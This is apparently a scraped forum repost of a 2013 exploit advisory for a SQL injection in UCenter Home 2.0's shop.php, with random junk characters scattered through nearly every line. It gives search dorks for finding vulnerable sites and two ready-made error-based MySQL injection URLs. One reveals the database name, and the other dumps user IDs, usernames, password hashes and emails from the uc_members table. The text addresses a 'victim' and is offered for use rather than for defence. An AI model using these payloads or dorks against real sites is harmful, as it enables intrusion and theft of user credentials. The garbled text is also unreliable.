' {/ V; J$ Z9 r; B h; u$ j__--==UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability==--__ ! w/ J8 C6 }& ?6 t
1 R2 z" w+ d# k1 y+ W' T. }& u
5 W, p" e+ }! p" z' K: h
, v9 H8 x! }. B+ d. t' V% G7 m*/ Author : KnocKout
4 w ~! P3 k. c x: p/ ~* _3 o8 u. O C- |- e
*/ Greatz : DaiMon,BARCOD3,RiskY and iranian hackers 1 y* J5 u! h# O5 e( S9 t
3 j ]( ^. e0 u6 M( [4 n# u
*/ Contact: knockoutr@msn.com
+ k9 A9 T/ c3 w4 Q) W" n# Z7 ^8 `% T+ x& L% |
*/ Cyber-Warrior.org/CWKnocKout ( |' i3 I: b) x3 R' y g* J4 i
2 w, s! o+ ]9 }4 b6 V5 g+ e! Z: U# }7 s
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
8 U5 q* e! h* x$ o, n/ X w/ i# |- Q9 o4 Z
Script : UCenter Home
) C, H, J) E" p, {. t# M3 Q) g) H) X4 s: F% |* D; Y
Version : 2.0 ( I/ x( i9 S% l
! s$ I: i0 X+ F- k
Script HomePage : http://u.discuz.net/
& a/ \4 O/ r/ s7 @0 u+ `; H3 ^2 x7 Q8 I! b5 R1 N" V3 w6 g2 z
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--== 1 U+ o* h* d2 U
9 c- V. S t) y' ADork : Powered by UCenter inurl:shop.php?ac=view * }2 Z6 s( o1 {
* D* Y% c; J5 }Dork 2 : inurl:shop.php?ac=view&shopid=
9 T9 k* A8 T! J7 _+ X' p& h+ ^/ K2 y- f3 N& L
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
' |+ A+ }/ `8 o" ]9 P. g9 o
9 a5 a5 f$ Y3 K" PVuln file : Shop.php
4 @* } K/ E& ~! F. `6 x
/ H. L% L, O6 E1 `: ?value's : (?)ac=view&shopid=
n% l2 @) v$ e% a0 n9 d- B$ U- _2 P! P# P; ]8 M! [/ |
Vulnerable Style : SQL Injection (MySQL Error Based) . m. |0 O2 F9 j4 R) \+ y
- i9 X$ H6 E; v9 B" S7 t
Need Metarials : Hex Conversion ' Z! q) w0 D" m2 {
# O* B7 {3 t# Z" G. ]. }% L__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
3 _2 k/ B# D/ I$ V9 p. j8 v( U# B5 V
Your Need victim Database name.
- i% Y i+ ^$ O9 ~$ k8 v A/ J7 W+ \3 j# p4 N( Q9 H! B2 ?
for Inject : http://server/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 * r, X ~* Y) {; I# |9 C
_4 K' \0 p, j' D4 R" b
..
' g; H- \0 C3 Y# j( F7 T4 X5 G) [9 d! v/ w2 [
DB : Okey. ) |& {6 `- P! W7 T
' c2 |4 [1 u5 {$ a7 ~2 y0 vyour edit DB `[TARGET DB NAME]` ; @! n" ?% q% ]
: x" F" t7 ~4 h0 [
Example : 'hiwir1_ucenter'
% c& N9 c- b% b4 G
8 K9 ?7 l$ A! J' c, Y5 d, z0 ^; p: sEdit : Okey. 4 T/ I, b- }2 X: K [* X
0 r# S" ^5 W% r P/ i+ `+ A0 Y
Your use Hex conversion. And edit Your SQL Injection Exploit..
4 E- u" D) q$ p1 g. `" G8 \- D8 m a; N0 _
7 u8 K) b6 `7 H0 s( d1 J2 D" _1 n, ]' Z8 R: J+ v5 g
Exploit Code : http://server/shop.php?ac=view&shopid=253 253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
4 e& a; C6 k/ U" X0 u2 R/ i7 d |
发表于 2013-2-27 21:31:31
收藏
支持
反对